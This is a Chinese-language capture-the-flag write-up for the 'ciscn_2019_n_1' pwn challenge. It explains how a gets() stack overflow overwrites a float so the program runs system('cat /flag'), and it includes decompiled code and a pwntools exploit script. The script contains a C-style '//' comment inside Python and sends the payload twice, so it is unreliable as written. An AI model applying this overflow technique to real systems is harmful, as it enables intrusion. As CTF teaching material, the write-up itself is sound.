解题思路
程序内容
Let's guess the number.
11.28125
Its value should be 11.28125
让你猜数字,猜对了也不让你过
保护
[*] '/root/桌面/ciscn_2019_n_1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
64位正常保护
IDA
main
int func()
{
int result; // eax
char v1; // [rsp+0h] [rbp-30h]
float v2; // [rsp+2Ch] [rbp-4h]
v2 = 0.0;
puts("Let's guess the number.");
gets(&v1);
if ( v2 == 11.28125 )
result = system("cat /flag");
else
result = puts("Its value should be 11.28125");
return result;
}
进入IDA后可以看出来为什么无法通过了,因为我们是输入到了v1里面,但要求是v2=11.28125,同时v1是gets无限溢出,所以可以溢出到v2改成11.28125
EXP
from pwn import *
#io =remote("redirect.do-not-trust.hacking.run",10473)
io=process('./ciscn_2019_n_1')
payload=(b'a'*(0x30-4))+p32(0x41348000) //float是占4个字节,p32也是4位,所以64位程序偶尔也可以用一下p32
io.sendafter("number.\n",payload)
io.sendline(payload)
io.interactive()